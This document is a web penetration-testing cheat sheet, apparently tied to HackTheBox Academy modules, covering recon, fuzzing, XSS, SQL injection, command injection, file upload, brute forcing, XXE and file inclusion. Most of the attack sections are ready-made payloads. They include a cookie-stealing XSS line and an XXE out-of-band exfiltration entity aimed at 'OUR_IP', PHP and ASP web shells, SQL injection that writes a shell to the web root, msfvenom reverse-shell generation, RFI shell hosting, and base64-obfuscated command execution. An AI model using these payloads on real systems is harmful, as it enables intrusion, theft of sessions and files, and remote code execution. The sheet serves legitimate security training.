# Web Sec Cheat Sheet --- # WEB REQUESTS ## cURL | **Command** | **Description** | | --------------|-------------------| | `curl -h` | cURL help menu | | `curl inlanefreight.com` | Basic GET request | | `curl -s -O inlanefreight.com/index.html` | Download file | | `curl -k https://inlanefreight.com` | Skip HTTPS (SSL) certificate validation | | `curl inlanefreight.com -v` | Print full HTTP request/response details | | `curl -I https://www.inlanefreight.com` | Send HEAD request (only prints response headers) | | `curl -i https://www.inlanefreight.com` | Print response headers and response body | | `curl https://www.inlanefreight.com -A 'Mozilla/5.0'` | Set User-Agent header | | `curl -u admin:admin http://<SERVER_IP>:<PORT>/` | Set HTTP basic authorization credentials | | `curl http://admin:admin@<SERVER_IP>:<PORT>/` | Pass HTTP basic authorization credentials in the URL | | `curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:<PORT>/` | Set request header | | `curl 'http://<SERVER_IP>:<PORT>/search.php?search=le'` | Pass GET parameters | | `curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/` | Send POST request with POST data | | `curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/` | Set request cookies | | `curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php` | Send POST request with JSON data | ## APIs | **Command** | **Description** | | --------------|-------------------| | `curl http://<SERVER_IP>:<PORT>/api.php/city/london` | Read entry | | `curl -s http://<SERVER_IP>:<PORT>/api.php/city/ \| jq` | Read all entries | | `curl -X POST http://<SERVER_IP>:<PORT>/api.php/city/ -d '{"city_name":"HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'` | Create (add) entry | | `curl -X PUT http://<SERVER_IP>:<PORT>/api.php/city/london -d '{"city_name":"New_HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'` | Update (modify) entry | | `curl -X DELETE http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City` | Delete entry | ## Browser DevTools | **Shortcut** | **Description** | | --------------|-------------------| | [`CTRL+SHIFT+I`] or [`F12`] | Show devtools | | [`CTRL+SHIFT+E`] | Show Network tab | | [`CTRL+SHIFT+K`] | Show Console tab | # USING WEB PROXIES ## Burp Shortcuts | **Shortcut** | **Description** | | --------------|-------------------| | [`CTRL+R`] | Send to repeater | | [`CTRL+SHIFT+R`] | Go to repeater | | [`CTRL+I`] | Send to intruder | | [`CTRL+SHIFT+B`] | Go to intruder | | [`CTRL+U`] | URL encode | | [`CTRL+SHIFT+U`] | URL decode | ## ZAP Shortcuts | **Shortcut** | **Description** | | --------------|-------------------| | [`CTRL+B`] | Toggle intercept on/off | | [`CTRL+R`] | Go to replacer | | [`CTRL+E`] | Go to encode/decode/hash | ## Firefox Shortcuts | **Shortcut** | **Description** | | --------------|-------------------| | [`CTRL+SHIFT+R`] | Force Refresh Page | # INFORMATION GATHERING - WEB EDITION ## WHOIS | **Command** | **Description** | |-|-| | `export TARGET="domain.tld"` | Assign target to an environment variable. | | `whois $TARGET` | WHOIS lookup for the target. | --- ## DNS Enumeration | **Command** | **Description** | |-|-| | `nslookup $TARGET` | Identify the `A` record for the target domain. | | `nslookup -query=A $TARGET` | Identify the `A` record for the target domain. | | `dig $TARGET @<nameserver/IP>` | Identify the `A` record for the target domain. | | `dig a $TARGET @<nameserver/IP>` | Identify the `A` record for the target domain. | | `nslookup -query=PTR <IP>` | Identify the `PTR` record for the target IP address. | | `dig -x <IP> @<nameserver/IP>` | Identify the `PTR` record for the target IP address. | | `nslookup -query=ANY $TARGET` | Identify `ANY` records for the target domain. | | `dig any $TARGET @<nameserver/IP>` | Identify `ANY` records for the target domain. | | `nslookup -query=TXT $TARGET` | Identify the `TXT` records for the target domain. | | `dig txt $TARGET @<nameserver/IP>` | Identify the `TXT` records for the target domain. | | `nslookup -query=MX $TARGET` | Identify the `MX` records for the target domain. | | `dig mx $TARGET @<nameserver/IP>` | Identify the `MX` records for the target domain. | --- ## Passive Subdomain Enumeration | **Resource/Command** | **Description** | |-|-| | `VirusTotal` | [https://www.virustotal.com/gui/home/url](https://www.virustotal.com/gui/home/url) | | `Censys` | [https://censys.io/](https://censys.io/) | | `Crt.sh` | [https://crt.sh/](https://crt.sh/) | | `curl -s https://sonar.omnisint.io/subdomains/{domain} \| jq -r '.[]' \| sort -u` | All subdomains for a given domain. | | `curl -s https://sonar.omnisint.io/tlds/{domain} \| jq -r '.[]' \| sort -u` | All TLDs found for a given domain. | | `curl -s https://sonar.omnisint.io/all/{domain} \| jq -r '.[]' \| sort -u` | All results across all TLDs for a given domain. | | `curl -s https://sonar.omnisint.io/reverse/{ip} \| jq -r '.[]' \| sort -u` | Reverse DNS lookup on IP address. | | `curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} \| jq -r '.[]' \| sort -u` | Reverse DNS lookup of a CIDR range. | | `curl -s "https://crt.sh/?q=${TARGET}&output=json" \| jq -r '.[] \| "\(.name_value)\n\(.common_name)"' \| sort -u` | Certificate Transparency. | | `cat sources.txt \| while read source; do theHarvester -d "${TARGET}" -b $source -f "${source}-${TARGET}";done` | Searching for subdomains and other information on the sources provided in the source.txt list. | #### Sources.txt ```txt baidu bufferoverun crtsh hackertarget otx projecdiscovery rapiddns sublist3r threatcrowd trello urlscan vhost virustotal zoomeye ``` --- ## Passive Infrastructure Identification | **Resource/Command** | **Description** | |-|-| | `Netcraft` | [https://www.netcraft.com/](https://www.netcraft.com/) | | `WayBackMachine` | [http://web.archive.org/](http://web.archive.org/) | | `WayBackURLs` | [https://github.com/tomnomnom/waybackurls](https://github.com/tomnomnom/waybackurls) | | `waybackurls -dates https://$TARGET > waybackurls.txt` | Crawling URLs from a domain with the date it was obtained. | --- ## Active Infrastructure Identification | **Resource/Command** | **Description** | |-|-| | `curl -I "http://${TARGET}"` | Display HTTP headers of the target webserver. | | `whatweb -a https://www.facebook.com -v` | Technology identification. | | `Wappalyzer` | [https://www.wappalyzer.com/](https://www.wappalyzer.com/) | | `wafw00f -v https://$TARGET` | WAF Fingerprinting. | | `Aquatone` | [https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone) | | `cat subdomain.list \| aquatone -out ./aquatone -screenshot-timeout 1000` | Makes screenshots of all subdomains in the subdomain.list. | --- ## Active Subdomain Enumeration | **Resource/Command** | **Description** | |-|-| | `HackerTarget` | [https://hackertarget.com/zone-transfer/](https://hackertarget.com/zone-transfer/) | | `SecLists` | [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) | | `nslookup -type=any -query=AXFR $TARGET nameserver.target.domain` | Zone Transfer using Nslookup against the target domain and its nameserver. | | `gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt"` | Bruteforcing subdomains. | --- ## Virtual Hosts | **Resource/Command** | **Description** | |-|-| | `curl -s http://192.168.10.10 -H "Host: randomtarget.com"` | Changing the HOST HTTP header to request a specific domain. | | `cat ./vhosts.list \| while read vhost;do echo "\n********\nFUZZING: ${vhost}\n********";curl -s -I http://<IP address> -H "HOST: ${vhost}.target.domain" \| grep "Content-Length: ";done` | Bruteforcing for possible virtual hosts on the target domain. | | `ffuf -w ./vhosts -u http://<IP address> -H "HOST: FUZZ.target.domain" -fs 612` | Bruteforcing for possible virtual hosts on the target domain using `ffuf`. | --- ## Crawling | **Resource/Command** | **Description** | |-|-| | `ZAP` | [https://www.zaproxy.org/](https://www.zaproxy.org/) | | `ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt` | Discovering files and folders that cannot be spotted by browsing the website. | `ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS` | Mutated bruteforcing against the target web server. | # ATTACKING WEB APPLICATIONS WITH FFUF ## Ffuf | **Command** | **Description** | | --------------|-------------------| | `ffuf -h` | ffuf help | | `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ` | Directory Fuzzing | | `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ` | Extension Fuzzing | | `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php` | Page Fuzzing | | `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v` | Recursive Fuzzing | | `ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/` | Sub-domain Fuzzing | | `ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx` | VHost Fuzzing | | `ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx` | Parameter Fuzzing - GET | | `ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx` | Parameter Fuzzing - POST | | `ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx` | Value Fuzzing | ## Wordlists | **Command** | **Description** | | --------------|-------------------| | `/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt` | Directory/Page Wordlist | | `/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt` | Extensions Wordlist | | `/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt` | Domain Wordlist | | `/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt` | Parameters Wordlist | ## Misc | **Command** | **Description** | | --------------|-------------------| | `sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'` | Add DNS entry | | `for i in $(seq 1 1000); do echo $i >> ids.txt; done` | Create Sequence Wordlist | | `curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'` | curl w/ POST | # JAVASCRIPT DEOBFUSCATION ## Commands | **Command** | **Description** | | --------------|-------------------| | `curl http:/SERVER_IP:PORT/` | cURL GET request | | `curl -s http:/SERVER_IP:PORT/ -X POST` | cURL POST request | | `curl -s http:/SERVER_IP:PORT/ -X POST -d "param1=sample"` | cURL POST request with data | | `echo hackthebox \| base64` | base64 encode | | `echo ENCODED_B64 \| base64 -d` | base64 decode | | `echo hackthebox \| xxd -p` | hex encode | | `echo ENCODED_HEX \| xxd -p -r` | hex decode | | `echo hackthebox \| tr 'A-Za-z' 'N-ZA-Mn-za-m'` | rot13 encode | | `echo ENCODED_ROT13 \| tr 'A-Za-z' 'N-ZA-Mn-za-m'` | rot13 decode | ## Deobfuscation Websites | **Website** | | ----------------------------------| | [JS Console](https://jsconsole.com) | | [Prettier](https://prettier.io/playground/) | | [Beautifier](https://beautifier.io/) | | [JSNice](http://www.jsnice.org/) | ## Misc | **Command** | **Description** | | --------------|-------------------| | `ctrl+u` | Show HTML source code in Firefox | # CROSS-SITE SCRIPTING (XSS) ## Commands | Code | Description | | ----- | ----- | | **XSS Payloads** | | `<script>alert(window.origin)</script>` | Basic XSS Payload | | `<plaintext>` | Basic XSS Payload | | `<script>print()</script>` | Basic XSS Payload | | `<img src="" onerror=alert(window.origin)>` | HTML-based XSS Payload | | `<script>document.body.style.background = "#141d2b"</script>` | Change Background Color | | `<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>` | Change Background Image | | `<script>document.title = 'HackTheBox Academy'</script>` | Change Website Title | | `<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>` | Overwrite website's main body | | `<script>document.getElementById('urlform').remove();</script>` | Remove certain HTML element | | `<script src="http://OUR_IP/script.js"></script>` | Load remote script | | `<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>` | Send Cookie details to us | | **Commands** | | `python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"` | Run `xsstrike` on a url parameter | | `sudo nc -lvnp 80` | Start `netcat` listener | | `sudo php -S 0.0.0.0:80 ` | Start `PHP` server | # SQL INJECTION FUNDAMENTALS ## MySQL | **Command** | **Description** | | --------------|-------------------| | **General** | | `mysql -u root -h docker.hackthebox.eu -P 3306 -p` | login to mysql database | | `SHOW DATABASES` | List available databases | | `USE users` | Switch to database | | **Tables** | | `CREATE TABLE logins (id INT, ...)` | Add a new table | | `SHOW TABLES` | List available tables in current database | | `DESCRIBE logins` | Show table properties and columns | | `INSERT INTO table_name VALUES (value_1,..)` | Add values to table | | `INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)` | Add values to specific columns in a table | | `UPDATE table_name SET column1=newvalue1, ... WHERE <condition>` | Update table values | | **Columns** | | `SELECT * FROM table_name` | Show all columns in a table | | `SELECT column1, column2 FROM table_name` | Show specific columns in a table | | `DROP TABLE logins` | Delete a table | | `ALTER TABLE logins ADD newColumn INT` | Add new column | | `ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn` | Rename column | | `ALTER TABLE logins MODIFY oldColumn DATE` | Change column datatype | | `ALTER TABLE logins DROP oldColumn` | Delete column | | **Output** | | `SELECT * FROM logins ORDER BY column_1` | Sort by column | | `SELECT * FROM logins ORDER BY column_1 DESC` | Sort by column in descending order | | `SELECT * FROM logins ORDER BY column_1 DESC, id ASC` | Sort by two-columns | | `SELECT * FROM logins LIMIT 2` | Only show first two results | | `SELECT * FROM logins LIMIT 1, 2` | Only show first two results starting from index 2 | | `SELECT * FROM table_name WHERE <condition>` | List results that meet a condition | | `SELECT * FROM logins WHERE username LIKE 'admin%'` | List results where the name is similar to a given string | ## MySQL Operator Precedence * Division (`/`), Multiplication (`*`), and Modulus (`%`) * Addition (`+`) and Subtraction (`-`) * Comparison (`=`, `>`, `<`, `<=`, `>=`, `!=`, `LIKE`) * NOT (`!`) * AND (`&&`) * OR (`||`) ## SQL Injection | **Payload** | **Description** | | --------------|-------------------| | **Auth Bypass** | | `admin' or '1'='1` | Basic Auth Bypass | | `admin')-- -` | Basic Auth Bypass With comments | | [Auth Bypass Payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass) | | **Union Injection** | | `' order by 1-- -` | Detect number of columns using `order by` | | `cn' UNION select 1,2,3-- -` | Detect number of columns using Union injection | | `cn' UNION select 1,@@version,3,4-- -` | Basic Union injection | | `UNION select username, 2, 3, 4 from passwords-- -` | Union injection for 4 columns | | **DB Enumeration** | | `SELECT @@version` | Fingerprint MySQL with query output | | `SELECT SLEEP(5)` | Fingerprint MySQL with no output | | `cn' UNION select 1,database(),2,3-- -` | Current database name | | `cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -` | List all databases | | `cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -` | List all tables in a specific database | | `cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -` | List all columns in a specific table | | `cn' UNION select 1, username, password, 4 from dev.credentials-- -` | Dump data from a table in another database | | **Privileges** | | `cn' UNION SELECT 1, user(), 3, 4-- -` | Find current user | | `cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -` | Find if user has admin privileges | | `cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -` | Find if all user privileges | | `cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -` | Find which directories can be accessed through MySQL | | **File Injection** | | `cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -` | Read local file | | `select 'file written successfully!' into outfile '/var/www/html/proof.txt'` | Write a string to a local file | | `cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -` | Write a web shell into the base web directory | # SQLMAP ESSENTIALS | **Command** | **Description** | | ------------------------------------------------------------ | ----------------------------------------------------------- | | `sqlmap -h` | View the basic help menu | | `sqlmap -hh` | View the advanced help menu | | `sqlmap -u "http://www.example.com/vuln.php?id=1" --batch` | Run `SQLMap` without asking for user input | | `sqlmap 'http://www.example.com/' --data 'uid=1&name=test'` | `SQLMap` with POST request | | `sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'` | POST request specifying an injection point with an asterisk | | `sqlmap -r req.txt` | Passing an HTTP request file to `SQLMap` | | `sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'` | Specifying a cookie header | | `sqlmap -u www.target.com --data='id=1' --method PUT` | Specifying a PUT request | | `sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt` | Store traffic to an output file | | `sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch` | Specify verbosity level | | `sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"` | Specifying a prefix or suffix | | `sqlmap -u www.example.com/?id=1 -v 3 --level=5` | Specifying the level and risk | | `sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba` | Basic DB enumeration | | `sqlmap -u "http://www.example.com/?id=1" --tables -D testdb` | Table enumeration | | `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname` | Table/row enumeration | | `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"` | Conditional enumeration | | `sqlmap -u "http://www.example.com/?id=1" --schema` | Database schema enumeration | | `sqlmap -u "http://www.example.com/?id=1" --search -T user` | Searching for data | | `sqlmap -u "http://www.example.com/?id=1" --passwords --batch` | Password enumeration and cracking | | `sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"` | Anti-CSRF token bypass | | `sqlmap --list-tampers` | List all tamper scripts | | `sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba` | Check for DBA privileges | | `sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"` | Reading a local file | | `sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"` | Writing a file | | `sqlmap -u "http://www.example.com/?id=1" --os-shell` | Spawning an OS shell | ## Injection Operators | **Injection Operator** | **Injection Character** | **URL-Encoded Character** | **Executed Command** | |-|-|-|-| |Semicolon| `;`|`%3b`|Both| |New Line| `\n`|`%0a`|Both| |Background| `&`|`%26`|Both (second output generally shown first)| |Pipe| `\|`|`%7c`|Both (only second output is shown)| |AND| `&&`|`%26%26`|Both (only if first succeeds)| |OR| `\|\|`|`%7c%7c`|Second (only if first fails)| |Sub-Shell| ` `` `|`%60%60`|Both (Linux-only)| |Sub-Shell| `$()`|`%24%28%29`|Both (Linux-only)| --- # COMMAND INJECTIONS # Linux ## Filtered Character Bypass | Code | Description | | ----- | ----- | | `printenv` | Can be used to view all environment variables | | **Spaces** | | `%09` | Using tabs instead of spaces | | `${IFS}` | Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. `$()`) | | `{ls,-la}` | Commas will be replaced with spaces | | **Other Characters** | | `${PATH:0:1}` | Will be replaced with `/` | | `${LS_COLORS:10:1}` | Will be replaced with `;` | | `$(tr '!-}' '"-~'<<<[)` | Shift character by one (`[` -> `\`) | --- ## Blacklisted Command Bypass | Code | Description | | ----- | ----- | | **Character Insertion** | | `'` or `"` | Total must be even | | `$@` or `\` | Linux only | | **Case Manipulation** | | `$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")` | Execute command regardless of cases | | `$(a="WhOaMi";printf %s "${a,,}")` | Another variation of the technique | | **Reversed Commands** | | `echo 'whoami' \| rev` | Reverse a string | | `$(rev<<<'imaohw')` | Execute reversed command | | **Encoded Commands** | | `echo -n 'cat /etc/passwd \| grep 33' \| base64` | Encode a string with base64 | | `bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)` | Execute b64 encoded string | --- # Windows ## Filtered Character Bypass | Code | Description | | ----- | ----- | | `Get-ChildItem Env:` | Can be used to view all environment variables - (PowerShell) | | **Spaces** | | `%09` | Using tabs instead of spaces | | `%PROGRAMFILES:~10,-5%` | Will be replaced with a space - (CMD) | | `$env:PROGRAMFILES[10]` | Will be replaced with a space - (PowerShell) | | **Other Characters** | | `%HOMEPATH:~0,-17%` | Will be replaced with `\` - (CMD) | | `$env:HOMEPATH[0]` | Will be replaced with `\` - (PowerShell) | --- ## Blacklisted Command Bypass | Code | Description | | ----- | ----- | | **Character Insertion** | | `'` or `"` | Total must be even | | `^` | Windows only (CMD) | | **Case Manipulation** | | `WhoAmi` | Simply send the character with odd cases | | **Reversed Commands** | | `"whoami"[-1..-20] -join ''` | Reverse a string | | `iex "$('imaohw'[-1..-20] -join '')"` | Execute reversed command | | **Encoded Commands** | | `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))` | Encode a string with base64 | | `iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"` | Execute b64 encoded string | # FILE UPLOAD ATTACKS ## Web Shells | **Web Shell** | **Description** | | --------------|-------------------| | `<?php file_get_contents('/etc/passwd'); ?>` | Basic PHP File Read | | `<?php system('hostname'); ?>` | Basic PHP Command Execution | | `<?php system($_REQUEST['cmd']); ?>` | Basic PHP Web Shell | | `<% eval request('cmd') %>` | Basic ASP Web Shell | | `msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php` | Generate PHP reverse shell | | [PHP Web Shell](https://github.com/Arrexel/phpbash) | PHP Web Shell | | [PHP Reverse Shell](https://github.com/pentestmonkey/php-reverse-shell) | PHP Reverse Shell | | [Web/Reverse Shells](https://github.com/danielmiessler/SecLists/tree/master/Web-Shells) | List of Web Shells and Reverse Shells | ## Bypasses | **Command** | **Description** | | --------------|-------------------| | **Client-Side Bypass** | | `[CTRL+SHIFT+C]` | Toggle Page Insepctor | | **Blacklist Bypass** | | `shell.phtml` | Uncommon Extension | | `shell.pHp` | Case Manipulation | | [PHP Extensions](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst) | List of PHP Extensions | | [ASP Extensions](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP) | List of ASP Extensions | | [Web Extensions](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt) | List of Web Extensions | | **Whitelist Bypass** | | `shell.jpg.php` | Double Extension | | `shell.php.jpg` | Reverse Double Extension | | `%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\`, `.`, `…` | Character Injection - Before/After Extension | | **Content/Type Bypass** | | [Web Content-Types](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt) | List of Web Content-Types | | [Content-Types](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt) | List of All Content-Types | | [File Signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) | List of File Signatures/Magic Bytes | ## Limited Uploads | **Potential Attack** | **File Types** | | --------------|-------------------| | `XSS` | HTML, JS, SVG, GIF | | `XXE`/`SSRF` | XML, SVG, PDF, PPT, DOC | | `DoS` | ZIP, JPG, PNG | # LOGIN BRUTE FORCING ## Hydra | **Command** | **Description** | | --------------|-------------------| | `hydra -h` | hydra help | | `hydra -C wordlist.txt SERVER_IP -s PORT http-get /` | Basic Auth Brute Force - Combined Wordlist | | `hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get /` | Basic Auth Brute Force - User/Pass Wordlists | | `hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"` | Login Form Brute Force - Static User, Pass Wordlist | | `hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4` | SSH Brute Force - User/Pass Wordlists | | `hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1` | FTP Brute Force - Static User, Pass Wordlist | ## Wordlists | **Command** | **Description** | | --------------|-------------------| | `/opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt` | Default Passwords Wordlist | | `/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt` | Common Passwords Wordlist | | `/opt/useful/SecLists/Usernames/Names/names.txt` | Common Names Wordlist | ## Misc | **Command** | **Description** | | --------------|-------------------| | `cupp -i` | Creating Custom Password Wordlist | | `sed -ri '/^.{,7}$/d' william.txt` | Remove Passwords Shorter Than 8 | | ```sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt``` | Remove Passwords With No Special Chars | | `sed -ri '/[0-9]+/!d' william.txt` | Remove Passwords With No Numbers | | `./username-anarchy Bill Gates > bill.txt` | Generate Usernames List | | `ssh b.gates@SERVER_IP -p PORT` | SSH to Server | | `ftp 127.0.0.1` | FTP to Server | | `su - user` | Switch to User | # BROKEN AUTHENTICATION ## Fuzz | **Command** | **Description** | | --------------|-------------------| | `wfuzz -z file,/path/to/wordlist.txt -u http://127.0.0.1:80/site/FUZZ` | Fuzz using a wordlist | | `wfuzz -z file,/path/to/user.txt -z file,/path/to/pass.txt http://127.0.0.1/login.php -d "user=FUZZ&pass=FUZ2Z"` | Fuzz using POST method and two wordlists | | `wfuzz -H Foo:FUZZ` | Fuzz header | | `-X GET , -X POST` | Choose method | ## Grep | **Command** | **Description** | | --------------|-------------------| | `grep '[[:classname:]]' file.txt` | Find strings that contain a given class. Classes are: [[:graph:]], [[:lower:]], [[:print:]], [[:punct:]], [[:space:]], [[:upper:]], and [[:xdigit:]] | | `grep -x '.\{123\}'` | Find strings with length of 123 | ## Misc | **Command** | **Description** | | --------------|-------------------| | `echo -n academy \| xxd -p` | Convert hex to ASCII | | `echo -n 61636164656d79 \| xxd -r -p` | Convert ASCII to hex | ## Resource | **Site name** | **Description** | | ----------------|-------------------| | CyberChef | https://gchq.github.io/CyberChef | | Decodify | https://github.com/s0md3v/Decodify | # WEB ATTACKS ## HTTP Verb Tampering `HTTP Method` - `HEAD` - `PUT` - `DELETE` - `OPTIONS` - `PATCH` | **Command** | **Description** | | --------------|-------------------| | `-X OPTIONS` | Set HTTP Method with Curl | ## IDOR `Identify IDORS` - In `URL parameters & APIs` - In `AJAX Calls` - By `understanding reference hashing/encoding` - By `comparing user roles` | **Command** | **Description** | | --------------|-------------------| | `md5sum` | MD5 hash a string | | `base64` | Base64 encode a string | ## XXE | **Code** | **Description** | | ---------------------------------------------------------------------------------- | ---------------------------------------------- | | `<!ENTITY xxe SYSTEM "http://localhost/email.dtd">` | Define External Entity to a URL | | `<!ENTITY xxe SYSTEM "file:///etc/passwd">` | Define External Entity to a file path | | `<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">` | Read PHP source code with base64 encode filter | | `<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">` | Reading a file through a PHP error | | `<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">` | Reading a file OOB exfiltration | # FILE INCLUSION ## Local File Inclusion | **Command** | **Description** | | --------------|-------------------| | **Basic LFI** | | `/index.php?language=/etc/passwd` | Basic LFI | | `/index.php?language=../../../../etc/passwd` | LFI with path traversal | | `/index.php?language=/../../../etc/passwd` | LFI with name prefix | | `/index.php?language=./languages/../../../../etc/passwd` | LFI with approved path | | **LFI Bypasses** | | `/index.php?language=....//....//....//....//etc/passwd` | Bypass basic path traversal filter | | `/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64` | Bypass filters with URL encoding | | `/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]` | Bypass appended extension with path truncation (obsolete) | | `/index.php?language=../../../../etc/passwd%00` | Bypass appended extension with null byte (obsolete) | | `/index.php?language=php://filter/read=convert.base64-encode/resource=config` | Read PHP with base64 filter | ## Remote Code Execution | **Command** | **Description** | | --------------|-------------------| | **PHP Wrappers** | | `/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id` | RCE with data wrapper | | `curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"` | RCE with input wrapper | | `curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"` | RCE with expect wrapper | | **RFI** | | `echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>` | Host web shell | | `/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id` | Include remote PHP web shell | | **LFI + Upload** | | `echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif` | Create malicious image | | `/index.php?language=./profile_images/shell.gif&cmd=id` | RCE with malicious uploaded image | | `echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php` | Create malicious zip archive 'as jpg' | | `/index.php?language=zip://shell.zip%23shell.php&cmd=id` | RCE with malicious uploaded zip | | `php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg` | Create malicious phar 'as jpg' | | `/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id` | RCE with malicious uploaded phar | | **Log Poisoning** | | `/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd` | Read PHP 